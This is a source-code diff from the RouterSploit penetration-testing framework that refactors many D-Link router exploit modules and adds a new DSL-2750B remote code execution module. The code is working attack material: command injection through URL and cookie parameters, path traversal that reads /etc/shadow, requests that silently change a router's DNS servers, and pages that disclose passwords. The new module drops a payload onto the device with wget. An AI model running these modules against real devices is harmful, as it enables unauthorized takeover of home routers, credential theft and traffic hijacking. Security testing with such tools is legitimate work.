routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-645 Password Disclosure vulnerability. - If the target is vulnerable it allows to read credentials." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DIR-645 Password Disclosure', - 'description': 'Module exploits D-Link DIR-645 password disclosure vulnerability.', - 'authors': [ - 'Roberto Paleari ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-645 Password Disclosure", + "description": "Module exploits D-Link DIR-645 password disclosure vulnerability.", + "authors": [ + "Roberto Paleari ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' + "references": [ + "https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt", ], - 'devices': [ - 'D-Link DIR-645 (Versions < 1.03)', + "devices": [ + "D-Link DIR-645 (Versions < 1.03)", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") def run(self): # address and parameters - url = "{}:{}/getcfg.php".format(self.target, self.port) data = {"SERVICES": "DEVICE.ACCOUNT"} # connection - response = http_request(method="POST", url=url, data=data) + response = self.http_request( + method="POST", + path="/getcfg.php", + data=data + ) if response is None: return @@ -60,10 +51,13 @@ def run(self): @mute def check(self): # address and parameters - url = "{}:{}/getcfg.php".format(self.target, self.port) data = {"SERVICES": "DEVICE.ACCOUNT"} - response = http_request(method="POST", url=url, data=data) + response = self.http_request( + method="POST", + path="/getcfg.php", + data=data + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py b/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py index e2b47e25b..71a00e1f3 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py @@ -1,35 +1,25 @@ -import socket +from routersploit.core.exploit import * +from routersploit.core.udp.udp_client import UDPClient -from routersploit import ( - exploits, - print_status, - mute, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(UDPClient): __info__ = { - 'name': 'D-Link DIR-815 & DIR-850L RCE', - 'description': 'Module exploits D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability which allows executing command on the device.', - 'authors': [ - 'Samuel Huntley', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-815 & DIR-850L RCE", + "description": "Module exploits D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability which allows executing command on the device.", + "authors": [ + "Samuel Huntley", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/38715/', + "references": [ + "https://www.exploit-db.com/exploits/38715/", ], - 'devices': [ - 'D-Link DIR-815', - 'D-Link DIR-850L', + "devices": [ + "D-Link DIR-815", + "D-Link DIR-850L", ] } - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(1900, "Target UPNP port") def run(self): print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.") @@ -45,8 +35,6 @@ def execute(self, cmd): 'MAN:"ssdp:discover"\r\n\r\n') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.settimeout(20.0) - s.connect((self.target, 1900)) s.send(buf) s.close() diff --git a/routersploit/modules/exploits/routers/dlink/dir_825_path_traversal.py b/routersploit/modules/exploits/routers/dlink/dir_825_path_traversal.py index 8e21ae6ee..66e86ad31 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_825_path_traversal.py +++ b/routersploit/modules/exploits/routers/dlink/dir_825_path_traversal.py @@ -1,59 +1,54 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-825 path traversal vulnerability. - If the target is vulnerable it allows to read files from the device." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DIR-825 Path Traversal', - 'description': 'Module exploits D-Link DIR-825 path traversal vulnerability, which allows reading files from the device', - 'authors': [ - 'Samuel Huntley', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-825 Path Traversal", + "description": "Module exploits D-Link DIR-825 path traversal vulnerability, which allows reading files from the device.", + "authors": [ + "Samuel Huntley", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/38718/', + "references": [ + "https://www.exploit-db.com/exploits/38718/", ], - 'devices': [ - 'D-Link DIR-825', + "devices": [ + "D-Link DIR-825", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - filename = exploits.Option('/etc/shadow', 'File to read') # file to read - username = exploits.Option('admin', 'Username to log in with') # username - default: admin - password = exploits.Option('', 'Password to log in with') # password - default: blank + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/shadow", "File to read") # file to read + username = OptString("admin", "Username to log in with") # username - default: admin + password = OptString("", "Password to log in with") # password - default: blank def run(self): if self.check(): print_success("Target seems to be vulnerable") file_path = "..{}".format(self.filename) - url = "{}:{}/apply.cgi".format(self.target, self.port) - data = {"html_response_page": file_path, - "action": "do_graph_auth", - "login_name": "test", - "login_pass": "test1", - "&login_n": "test2", - "log_pass": "test3", - "graph_code": "63778", - "session_id": "test5", - "test": "test"} + data = { + "html_response_page": file_path, + "action": "do_graph_auth", + "login_name": "test", + "login_pass": "test1", + "&login_n": "test2", + "log_pass": "test3", + "graph_code": "63778", + "session_id": "test5", + "test": "test" + } print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password)) - response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) + response = self.http_request( + method="POST", + path="/apply.cgi", + data=data, + auth=(self.username, self.password) + ) if response is None: return @@ -67,22 +62,28 @@ def run(self): @mute def check(self): - url = "{}:{}/apply.cgi".format(self.target, self.port) - data = {"html_response_page": "/etc/passwd", - "action": "do_graph_auth", - "login_name": "test", - "login_pass": "test1", - "&login_n": "test2", - "log_pass": "test3", - "graph_code": "63778", - "session_id": "test5", - "test": "test"} + data = { + "html_response_page": "/etc/passwd", + "action": "do_graph_auth", + "login_name": "test", + "login_pass": "test1", + "&login_n": "test2", + "log_pass": "test3", + "graph_code": "63778", + "session_id": "test5", + "test": "test" + } - response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) + response = self.http_request( + method="POST", + path="/apply.cgi", + data=data, + auth=(self.username, self.password) + ) if response is None: return False # target is not vulnerable - if "root:" in response.text: + if utils.detect_file_content(response.text, "/etc/passwd"): return True # target vulnerable return False # target not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py b/routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py index 793378b33..86bdc426a 100644 --- a/routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py @@ -1,65 +1,46 @@ import re import string +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - random_text, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DNS-320L and DNS-327L Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-LINK DNS-320L & DIR-327L RCE', - 'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.', - 'authors': [ - 'Gergely Eberhardt', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DNS-320L & DIR-327L RCE", + "description": "Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution " + "vulnerability which allows executing command on the device.", + "authors": [ + "Gergely Eberhardt", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf', + "references": [ + "http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf", ], - 'devices': [ - 'DNS-320L 1.03b04', - 'DNS-327L, 1.02', + "devices": [ + "D-Link DNS-320L 1.03b04", + "D-Link DNS-327L, 1.02", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - mark = random_text(32) - url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark) + mark = utils.random_text(32) + path = "/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(cmd, mark) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) if response is None: return "" @@ -74,13 +55,17 @@ def execute(self, cmd): @mute def check(self): - number = int(random_text(6, alph=string.digits)) + number = int(utils.random_text(6, alph=string.digits)) solution = number - 1 cmd = "echo $(({}-1))".format(number) - url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd) + path = "/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" \ + "{};echo ffffffffffffffff;".format(cmd) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dsl_2640b_dns_change.py b/routersploit/modules/exploits/routers/dlink/dsl_2640b_dns_change.py index 6662d570d..dbe29ae22 100644 --- a/routersploit/modules/exploits/routers/dlink/dsl_2640b_dns_change.py +++ b/routersploit/modules/exploits/routers/dlink/dsl_2640b_dns_change.py @@ -1,52 +1,43 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DSL-2640B DNS Change vulnerability. - If the target is vulnerable it possible to change dns settings" - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DSL-2640B DNS Change', - 'description': 'Module exploits D-Link DSL-2640B dns change vulnerability.' - 'If the target is vulnerable it is possible to change dns settings.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DSL-2640B DNS Change", + "description": "Module exploits D-Link DSL-2640B dns change vulnerability. " + "If the target is vulnerable it is possible to change dns settings.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/36105/', - 'https://github.com/jh00nbr/Routerhunter-2.0', + "references": [ + "https://www.exploit-db.com/exploits/36105/", + "https://github.com/jh00nbr/Routerhunter-2.0", ], - 'devices': [ - 'D-Link DSL-2640B', + "devices": [ + "D-Link DSL-2640B", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server') - dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + dns1 = OptString("8.8.8.8", 'Primary DNS Server') + dns2 = OptString("8.8.4.4", 'Seconary DNS Server') def run(self): - url = "{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP".format(self.target, - self.port, - self.dns1, - self.dns2) + path = "/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP".format(self.dns1, + self.dns2) print_status("Attempting to change DNS settings...") print_status("Primary DNS: {}".format(self.dns1)) print_status("Secondary DNS: {}".format(self.dns2)) - response = http_request(method="POST", url=url) + response = self.http_request( + method="POST", + path=path + ) if response is None: return diff --git a/routersploit/modules/exploits/routers/dlink/dsl_2730_2750_path_traversal.py b/routersploit/modules/exploits/routers/dlink/dsl_2730_2750_path_traversal.py index 7b3704000..46a533bd3 100644 --- a/routersploit/modules/exploits/routers/dlink/dsl_2730_2750_path_traversal.py +++ b/routersploit/modules/exploits/routers/dlink/dsl_2730_2750_path_traversal.py @@ -1,45 +1,40 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DSL-2730U/2750U/2750E Path Traversal vulnerability. - If the target is vulnerable, content of the specified file is returned. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DSL-2730U/2750U/2750E Path Traversal', - 'description': 'Module exploits D-Link DSL-2730U/2750U/2750E Path Traversal vulnerability which allows to read any file on the system.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DSL-2730U/2750U/2750E Path Traversal", + "description": "Module exploits D-Link DSL-2730U/2750U/2750E Path Traversal " + "vulnerability which allows to read any file on the system.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/40735/', + "references": [ + "https://www.exploit-db.com/exploits/40735/", ], - 'devices': [ - 'D-Link DSL-2730U', - 'D-Link DSL-2750U', - 'D-Link DSL-2750E' + "devices": [ + "D-Link DSL-2730U", + "D-Link DSL-2750U", + "D-Link DSL-2750E", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - filename = exploits.Option('/etc/shadow', 'File to read') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/shadow", "File to read") def run(self): if self.check(): - url = "{}:{}/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard".format(self.target, self.port, self.filename) + path = "/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us" \ + "&var:menu=setup&var:page=wizard".format(self.filename) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return @@ -53,13 +48,17 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard".format(self.target, self.port) + path = "/cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html&var:language=en_us" \ + "&var:menu=setup&var:page=wizard" - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return False # target is not vulnerable - if "root:" in response.text: + if utils.detect_file_content(response.text, "/etc/passwd"): return True # target vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change.py b/routersploit/modules/exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change.py index 63f82a812..607b7ee5e 100644 --- a/routersploit/modules/exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change.py +++ b/routersploit/modules/exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change.py @@ -1,54 +1,45 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DSL-2780B, DSL-2730B and DSL-526B DNS Change vulnerability. - If the target is vulnerable it possible to change dns settings" - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change', - 'description': 'Module exploits D-Link DSL-2780B, DSL-2730B and DSL-526B dns change vulnerability.' - 'If the target is vulnerable it is possible to change dns settings.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change", + "description": "Module exploits D-Link DSL-2780B, DSL-2730B and DSL-526B dns change vulnerability. " + "If the target is vulnerable it is possible to change dns settings.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/37237/', - 'https://github.com/jh00nbr/Routerhunter-2.0', + "references": [ + "https://www.exploit-db.com/exploits/37237/", + "https://github.com/jh00nbr/Routerhunter-2.0", ], - 'devices': [ - 'D-Link DSL-2780B', - 'D-Link DSL-2730B', - 'D-Link DSL-526B', + "devices": [ + "D-Link DSL-2780B", + "D-Link DSL-2730B", + "D-Link DSL-526B", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server') - dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + dns1 = OptString("8.8.8.8", "Primary DNS Server") + dns2 = OptString("8.8.4.4", "Seconary DNS Server") def run(self): - url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target, - self.port, - self.dns1, - self.dns2) + path = "/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.dns1, + self.dns2) print_status("Attempting to change DNS settings...") print_status("Primary DNS: {}".format(self.dns1)) print_status("Secondary DNS: {}".format(self.dns2)) - response = http_request(method="POST", url=url) + response = self.http_request( + method="POST", + path=path + ) if response is None: return diff --git a/routersploit/modules/exploits/routers/dlink/dsl_2740r_dns_change.py b/routersploit/modules/exploits/routers/dlink/dsl_2740r_dns_change.py index 7d435e83a..a3731027c 100644 --- a/routersploit/modules/exploits/routers/dlink/dsl_2740r_dns_change.py +++ b/routersploit/modules/exploits/routers/dlink/dsl_2740r_dns_change.py @@ -1,52 +1,43 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DSL-2740R DNS Change vulnerability. - If the target is vulnerable it possible to change dns settings" - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DSL-2740R DNS Change', - 'description': 'Module exploits D-Link DSL-2740R dns change vulnerability.' - 'If the target is vulnerable it is possible to change dns settings.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DSL-2740R DNS Change", + "description": "Module exploits D-Link DSL-2740R dns change vulnerability. " + "If the target is vulnerable it is possible to change dns settings.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/35917/', - 'https://github.com/jh00nbr/Routerhunter-2.0', + "references": [ + "https://www.exploit-db.com/exploits/35917/", + "https://github.com/jh00nbr/Routerhunter-2.0", ], - 'devices': [ - 'D-Link DSL-2740R', + "devices": [ + "D-Link DSL-2740R", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server') - dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + dns1 = OptString("8.8.8.8", "Primary DNS Server") + dns2 = OptString("8.8.4.4", "Seconary DNS Server") def run(self): - url = "{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}".format(self.target, - self.port, - self.dns1, - self.dns2) + path = "/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}".format(self.dns1, + self.dns2) print_status("Attempting to change DNS settings...") print_status("Primary DNS: {}".format(self.dns1)) print_status("Secondary DNS: {}".format(self.dns2)) - response = http_request(method="POST", url=url) + response = self.http_request( + method="POST", + path=path + ) if response is None: return diff --git a/routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py b/routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py index 3c1449f8c..5b36092bf 100644 --- a/routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py +++ b/routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py @@ -1,45 +1,35 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for DSL-2750B Information Disclosure vulnerability. - If the target is vulnerable it allows to read SSID, Wi-Fi password and PIN code." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DSL-2750B Info Disclosure', - 'description': 'Module explois information disclosure vulnerability in D-Link DSL-2750B devices. It is possible to retrieve sensitive information such as SSID, Wi-Fi password, PIN code.', - 'authors': [ - 'Alvaro Folgado # vulnerability discovery', - 'Jose Rodriguez # vulnerability discovery', - 'Ivan Sanz # vulnerability discovery', - 'Marcin Bury # routersploit module', + "name": "D-Link DSL-2750B Info Disclosure", + "description": "Module explois information disclosure vulnerability in D-Link DSL-2750B devices. " + "It is possible to retrieve sensitive information such as SSID, Wi-Fi password, PIN code.", + "authors": [ + "Alvaro Folgado", # vulnerability discovery + "Jose Rodriguez", # vulnerability discovery + "Ivan Sanz", # vulnerability discovery + "Marcin Bury ", # routersploit module, ], - 'references': [ - 'http://seclists.org/fulldisclosure/2015/May/129' + "references": [ + "http://seclists.org/fulldisclosure/2015/May/129", ], - 'devices': [ - 'D-Link DSL-2750B EU_1.01', + "devices": [ + "D-Link DSL-2750B EU_1.01", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/hidden_info.html".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/hidden_info.html" + ) if response is None: return @@ -62,9 +52,10 @@ def run(self): @mute def check(self): - url = "{}:{}/hidden_info.html".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/hidden_info.html" + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py b/routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py new file mode 100644 index 000000000..7bd45749a --- /dev/null +++ b/routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py @@ -0,0 +1,50 @@ +import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "D-Link DSL-2750B RCE", + "description": "Module exploits remote code execution vulnerability in D-Link DSL-2750B devices. ", + "authors": [ + "p@ql", # vulnerability discovery + "Marcin Bury ", # routersploit module, + ], + "references": [ + "http://seclists.org/fulldisclosure/2016/Feb/53", + "https://packetstormsecurity.com/files/135706/dlinkdsl2750b-exec.txt", + ], + "devices": [ + "D-Link DSL-2750B", + ], + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + def run(self): + if self.check(): + print_success("Target appears to be vulnerable") + shell(self, architecture="mipsbe", method="wget", location="/tmp") + + def execute(self, cmd): + path = "/login.cgi?cli=multilingual show';{}'$".format(cmd) + self.http_request( + method="GET", + path=path + ) + + def check(self): + response = self.http_request( + method="GET", + path="/ayefeaturesconvert.js" + ) + + if response and "DSL-2750B" in response.text: + version = re.findall(r"AYECOM_FWVER=\"(.*?)\";", response.text) + if version: + if utils.Version("1.01") <= utils.Version(version[0]) <= utils.Version("1.03"): + return True # target is vulnerable + + return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py b/routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py index f351f1cd1..9eff7e24c 100644 --- a/routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py @@ -1,37 +1,26 @@ -from routersploit import ( - exploits, - print_status, - print_error, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DPS-W110 Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DSP-W110 RCE', - 'description': 'Module exploits D-Link DSP-W110 Remote Command Execution vulnerability ' - 'which allows executing command on the operating system level.', - 'authors': [ - 'Peter Adkins ', # routersploit module + "name": "D-Link DSP-W110 RCE", + "description": "Module exploits D-Link DSP-W110 Remote Command Execution vulnerability " + "which allows executing command on the operating system level.", + "authors": [ + "Peter Adkins ", # routersploit module ], - 'references': [ - 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110' + "references": [ + "https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110", ], - 'devices': [ - 'D-Link DSP-W110 (Rev A) - v1.05b01' + "devices": [ + "D-Link DSP-W110 (Rev A) - v1.05b01", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -48,20 +37,22 @@ def execute(self, cmd): print_error("Command too long. Max is 18 characters.") return "" - url = "{}:{}/".format(self.target, self.port) - payload = "`{}`".format(cmd) - cookies = {"i": payload} - http_request(method="GET", url=url, cookies=cookies) + self.http_request( + method="GET", + path="/", + cookies=cookies + ) return "" @mute def check(self): - url = "{}:{}/".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/" + ) if response is not None and "Server" in response.headers.keys() and "lighttpd/1.4.34" in response.headers['Server']: return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py b/routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py index 5f8788031..657591a04 100644 --- a/routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py +++ b/routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py @@ -1,43 +1,32 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DVG-N5402SP path traversal vulnerability. - If the target is vulnerable it allows to read files from the device." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DVG-N5402SP Path Traversal', - 'description': 'Module exploits D-Link DVG-N5402SP path traversal vulnerability, which allows reading files form the device', - 'authors': [ - 'Karn Ganeshen', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DVG-N5402SP Path Traversal", + "description": "Module exploits D-Link DVG-N5402SP path traversal " + "vulnerability, which allows reading files form the device.", + "authors": [ + "Karn Ganeshen", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/39409/', - 'http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html', + "references": [ + "https://www.exploit-db.com/exploits/39409/", + "http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html", ], - 'devices': [ - 'D-Link DVG-N5402SP', + "devices": [ + "D-Link DVG-N5402SP", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port') # default port - filename = exploits.Option('/etc/shadow', 'File to read') # file to read + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") + + filename = OptString('/etc/shadow', 'File to read') # file to read def run(self): # address and parameters - url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../..{}".format(self.filename), @@ -52,7 +41,11 @@ def run(self): } # connection - response = http_request(method="POST", url=url, data=data) + response = self.http_request( + method="POST", + path="/cgi-bin/webproc", + data=data + ) if response is None: return @@ -66,7 +59,6 @@ def run(self): @mute def check(self): # address and parameters - url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../../etc/shadow", @@ -81,9 +73,13 @@ def check(self): } # connection - response = http_request(method="POST", url=url, data=data) + response = self.http_request( + method="POST", + path="/cgi-bin/webproc", 